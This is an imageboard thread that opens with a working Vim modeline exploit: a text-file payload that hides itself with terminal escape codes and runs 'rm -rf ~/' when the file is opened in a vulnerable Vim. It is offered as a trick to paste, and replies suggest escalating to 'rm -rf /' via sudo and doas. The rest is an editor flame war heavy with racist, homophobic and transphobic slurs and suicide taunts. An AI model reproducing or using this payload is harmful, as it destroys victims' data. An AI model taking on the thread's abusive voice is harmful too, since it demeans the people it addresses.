Vim executes .txt files

Create vimsucks.txt.

Paste this:
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'rm -rf ~/') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Open the file in Vim
$ vim vimsucks.txt

The text file "magically" changed.

Other urls found in this thread:


Nice find it worked, thanks OP

why does this exist

Because the modern ideal for a text editor is an operating system, not a text editor.

said no one ever

If you allow me to interject for a moment, what you refer to as operating system is, in fact, a reflexive programming environment.

Yes, like he said, an Operating System

Only retards don't use GNU Emacs. But even the faggots that use shit like Sublime Text or VS Code are less retared than Vim users.

Who is the fag who keeps modeline set on?

hide it like in the pic

Was it already fixed?

Attached: rm.png (1207x587, 91.03K)

source is useful when you're editing your ~/.vimrc, and want to see the changes without reopening vim. The real issue here is either modelines, which are a brainfucked idea, or the fact that they knew 'foldexpr' was a problem and thought they could sandbox it.
If you want a sandbox to have teeth, give it a whitelist. If you want it to be broken out of, give it a blacklist.

Error detected while processing modelines: E518: Unknown option: \\|\\
Doesn't work with gvim on Debian.

This is typical UNIX braindamage and not even remotely surprising. I haven't used anything other than my own text editor on my TCB for 10 years.
Disregarding the amount of UNIX braindamage required to make this exploit work (such as metacharacters), the idea of a text editor that changes behaviour based on some text at the start of the file in itself is already beyond fucktarded. I've never put that shit in any of my files, fix your editor yourself faggot, I don't need to configure it for you.



Explain how complex gnuefags is better than simple sublime ???

I never said anything about complexity.
GNU is based. You're the fag.

Wew, why the fuck.

oh so thats why there was a update. was wondering why debian stable would update a text editor.

if you're going to do this go all the way and rm -rf / and make sure to rerun it with sudo and doas after in case the retard has it passwordless

Attached: anon and his roommates.png (819x503, 396.98K)

An attack vector for vim users is text files. lmao

How about Gedit users?
Asking for a friend. He he...

i actually changed it to passwordless because i use things that require it so often that typing the password gets annoying. i dont run random shit tho

Are you retarded? Just leave a terminal open that is logged in as root if you are going to be using it so much. It's not even fun breaking systems like yours.

What version of vim are you using? Does it still work.

He is.


Now we know why, in fact, ed is the only acceptable editor in the Unix-braindamaged world.
Classic vi might be barely passable if not bugged as shit.

ne is pretty good. All a text editor needs to be really powerful is macros, keyboard shortcuts and the ability to pass text blocks through external programs on the fly. Scripting language inside a text editor is bloat. Vim is uberbloat. I don't know what emacs even is.

I use the /usr/bin/vi in *BSD all the time and never had trouble with bugs. I stopped bothering with vim when they added more bloats around v6 or v7 or something. If I ever need more than plain vi, I use elvis, it's alright.
This is on NetBSD:
armv7# ls -l /bin/ed /usr/bin/vi /usr/pkg/bin/elvis-r-xr-xr-x 1 root wheel 69092 Jul 17 2018 /bin/ed*-r-xr-xr-x 3 root wheel 474476 Jul 17 2018 /usr/bin/vi*-rwxr-xr-x 1 root wheel 793040 Dec 11 2018 /usr/pkg/bin/elvis*armv7# ldd /bin/ed /usr/bin/vi /usr/pkg/bin/elvis/bin/ed: -lcrypt.1 => /lib/ -lc.12 => /lib/ -lcurses.7 => /usr/lib/ -lterminfo.1 => /usr/lib/ -lc.12 => /usr/lib/ -lutil.7 => /usr/lib/ -lterminfo.1 => /usr/lib/ -lc.12 => /usr/lib/ -lresolv.3 => /usr/lib/
For comparison, Amiga Notepad is 52 KB. It also has some CLI editors that are ~ 20 KB though.
colors got borked because I ran e-uae over ssh, which confused xwd for some reason

Attached: foo.png (720x568, 15.84K)

many people seem to think that vim is a simple editor, but in reality vim is even more bloated than emacs (and most vim users even install a ton of 3rd-party extensions on top of what's available by default)

I want the good times back

ne started off on the amiga, actually. (It's very similar to TurboText) The default ne weights in at 233 kb (that's with Os and mthumb on an arm system) and it is also very low on memory consumption. I used emacs for years, then vim for a short while. My personal opinion on emacs is that it can do a lot of things, but none of them particularly well. Also lisp just didn't click with me. I understand the concept of the way you are commanding the text editor in vi* to do things for you and while it's interesting, I found that in practice it just complicates things and doesn't really add anything substantial to my workflow. (speed is actually pretty meaningless, it's the least of my concerns when I use an editor) Also people claiming emacs is ancient bloat that's hard to get into never tried to make vim do something. As the other user said, it's at least just as bad. Just blindly installing a bunch of plugins by a third party doesn't count. If you need to do that to make a text editor of all things usable, then the text editor is shit.

Eventually I realized I just want the editor to get out of my way and let me type things. ne is perfect for that and I can still pipe textblocks through external programs and write some macros. All I need. I removed it's syntax highlighting because I don't really need all that either. Different topic but try living without syntax highlighting for a while. You'll realize it's pretty pointless to have it and will eventually even start to find all these different colors distracting. Look at screenshots of modern editors and languages. Every word is basically a different color at this point. It looks like something out of kindergarten and I don't really think it makes anything easier to read.

We went so wrong regarding technology. I've been using an A20 in pure framebuffer on an 12" 800x600 screen (Point-of-Sale industrial screen that's very low power with 7W) and I'm more productive for it. Not being constantly attached to the botnet makes you start to think again how to come up with your own solutions. I restrict my internet time now. It's healthy.

I also still have my amigas and a plethora of expansions for them. Some day I'll set one up and go even more minimal than I am with my A20. (maybe I'll set it up with the A20, I found out the SoC not only has 1 but 4 composite decoders, yes - it has TV-IN) If you exclude the internet and it's bloated being, you can get along with a lot less hardware-wise.

You need to install a package to get syntax highlighting for each language. Don't ever talk shit about extensions ever again emacs tard.

since HN faggots use sublime, i'd guess it's only simple as in it doesn't let you do anything, it's bloated and slow as fuck, and it has an embedded web browser

Kek, butthurt users of the uganda editor kvetching.
Syntax highlighting works out of box in Gnu Emacs. If you need support for a language that isn't included in the default installation, you can just M-x list-packages and select the packages you want.

speed matters because when you type something and the computer sits there for 80ms you start to think you missed the key and start contemplating typing it again only to realize you just wasted a bunch of thought
yes, and it started when we drew GUIs using text + metacharacters
what is that, on the terminal? GUI built on text is not simple nor unbloated. you can literally get something simpler and faster with the framebuffer by using actual graphics instead of using text as a primitive. all computers made in the last 20 years are fast enough so this code can race the beam and get you vsynced image with zero input latency:
wait_for_vblank();sample_input();uint32_t (*framebuffer)[800]; //800x600 ARGB format for examplefor each character c to render to the window at x,y: for (int i=0;i

What a useless shill. Emacs is a much much worse ricing project than vim could ever dream of. lmao why would you even bring this up? It's like you are false flagging emacs faggots but I think you are genuinely this dumb.

like I said, you probably don't need a package, but installing a package (and keeping it up-to-date) is so easy that even an ugandafag can do it.

is this one of the major reasons you avoid vim? non-tech users fuck off

I don't even like Emacs, but I took the time to shame your retarded post, niggerfaggot.

nice larper thread as usual, Zig Forums

go back to >>>/reddit/ and stay there.

There are plenty of reasons to avoid vim.
For example:
0) Vim is not POSIX compatible (someone might expect that it is. idk)
1) Vim has a lot of legacy cruft
2) Gnu Emacs can emulate vim (evil-mode) while providing functionality that isn't included in vim
3) Gnu Emacs has way better documentation than vim
4) Gnu Emacs' extensions are written in a much better language (elisp) than vim's extensions (vimscript)
5) Gnu Emacs is easier to customize: just type M-x customize (to easily pick a theme, you can actually just type M-x customize-themes

answer the question you dick sucker. now it just sounds even more like the criteria you use to choose between vim or emacs (they're both shit) is whether it's Zig Forums approved or not

what the fuck are you talking about? how does your retarded shit rebuke my statement?

Holy shit. I found another reasonable being on Zig Forums.
I thought I'd never see that day, yet it happened.

He's right you know

Garbage thread

If you're talking about , no, he's not, since he didn't even provide a well-formed argument.
and: samefag
why? because you discovered your vim is indeed a piece of unix braindamaged shit?

yeah he's right. Also, when is the dick-chopping operation? I bet you aren't even white

There is needy chicken in uganda.

The slowness in text editors isn't so much about drawing on the screen, but rather managing the buffers and doing operations on said buffers. If the code is shit, it doesn't scale well when file becomes huge. Load a 1 GB binary into your editor and see how well it works editing that. Or if it even works at all, heh.
And personally, I really like plain text stuff since I can use it over serial connection. I don't want to have to depend on any kind of graphics. It's fine for games and stuff like that, but not for critical tools.

kys. perhaps if you actually tried to figure out what he's right about you'd realize how retarded the shit you're saying is.
KYS retarded fucking pol cancer. final solution when? here look at this diagram that explains how cancerous your generation is (pol is not even on the graph, it belongs on the right), and then kill yourself:
yes, since this board is run by retards i cant post the image directly, so you'll have to use some shitty webshit host

parse error

It's a bit ironic that you posted that because it's you who can't post images or even format your posts properly. Also, why do you get so fucking assblasted over this?

lol calm down. He's still right tho. It's probably the hormone therapy that makes you so edgy.


vi doesn't have text-objects though. As a developer, being able to delete everything in a set of curlies with di{, delete a function call's arguments with di(, or yank a string including the quotes with ya' is so helpful, and as far as I know oldschool vi doesn't have it.

tor users cant post images on this board, newfag
perhaps you should consider suicide rather than critizes my post formatting
and what the absolute fuck are you insinuating by quoting my quote of "tranny" as if my usage wasn't in quotes? this is some next level retarded shit and i can tell that you're actually serious unlike the polniggers here

im done replying to the polniggers here. i see now that all they do is repeat the same inane shit over and over while continuing to not even remotely address the original argument. nobody can be this stupid so their either trolling or mentally handicapped patients that had the misfortunte of stumbling upon Zig Forums during computer time

Ok, but please think about talking to your doctor regarding this moodiness of yours. He can probably prescribe you something (or refer you to somebody who can) to offset the emotional effect the HRT has. Good luck, friend.

Attached: oyveyoyvey.webm (360x360, 1.52M)

Well it's both since all software is currently retarded. A simple linked list per line would run faster than 99% of text editors out there (even if you count only popular / maintained ones).
You're literally depending on a GUI rendered to graphics rendered from a terminal emulator instead which is more complicated than plain GUI rendered on a framebuffer. The entire idea that text is somehow a more primitive, simple thing, is the epitome of UNIX braindamage.
At that point you'd get rid of line-editing and there would be no problem. You either use 1GB to make seeking faster or load only the area around the viewed segment to memory. As for viewing giant log files, you can simple load to N% of the file, and start rendering from there. Outside of UNIX braindamage, much better solutions exist, such as storing each log entry as separate items in a data structure.
What does this mean, viewing some retarded text console over serial?
This isn't a critical tool. It's literally some piece of shit firmware the most retarded demographic of programmers (embedded programmers) wrote up. They have never had a single security audit, nor has a single security researcher ever looked at their code (it would be a disaster otherwise). These are the people who reimplement strlen because "muh space constraints" (which is a fine reason in this case) and somehow manage to fuck it up so bad that there's a stack smash at every single invocation. Also thin clients are a retared UNIX braindamaged concept. The real white man's OS to replace UNIX will have real protocols instead of sending loosely formatted text over this and that channel.

You are not the first user today that I've seen suggesting it*. Can you elaborate on why do you think that syntax highlighting is bad?

*The first one made me read this:

Attached: vimsyntaxon.jpg (600x291, 43.32K)

It's distracting. It doesn't solve the thing it means to solve. It's also often inconsistent between languages in a given editor, sometimes jarringly so. If you get used to all the text color being the same, it just doesn't make a difference and you focus on the actual characters and words more. I think you could make a case for syntax highlighting for strings (to recognize them quickly as such) and comments (to make a difference between commented out code and normal code, like the linked article said) everything else is superfluous at best and distracting at worst IMHO. Just make an image search for "syntax highlighting" look at the examples presented and think if they really make anything easier to read. You have insanity like numbers highlighted in a different color as operators, and variables highlighted in yet another color. Yeah, I'd totally mistake an 8 for a + or a var1. In a long formula, this actually can get quite distracting pretty quick and again, it doesn't help, it doesn't aid the understanding, it doesn't add anything you don't already know. It's like adding a comment to i++; saying "this increments i by one".

it's actually misleading at worst since every editor fails to color properly half the time. especially vim. ill often be looking at some commented out code but its not the comment color, or the other way around. but colors are actually useful contrary to what the retared industry is doing with them

That's just because vim is trash. vscode doesn't have these problems.

is that the new branding of visual studio?
and yes, it does have problems. everything is shit.
anyway whenever you write a ton of code without compiling it (or interpreting, or any form of validation), there will be mistakes here and there, and at that point it's impossible to have correct syntax highlighting.

People are debating if Emacs are better than Vi and this madman just shilled vscode.

Attached: 22feab31a7cc4e344dadaf5f16aaa9a7ec84c4cbc1dc06278354867895b1aeb5.jpg (255x216, 7.71K)

reminds me of this autistic boomer who was shitposting almost violently about a 8-bit computer being made about how syntax highlighting is a mistake and wants muh grayscale monochrome text, perfectly sanitary, etc. The more I think about it, the more slowly I believe it.

No it's actually a different thing. vscode is an atom clone, text editor built in electron. Even has a legit open source repo like chromium/chrome.

that sounds even worse and this is b8

You fucking madman.

Attached: 1a1.png (605x453, 545.02K)

Are you a programmer?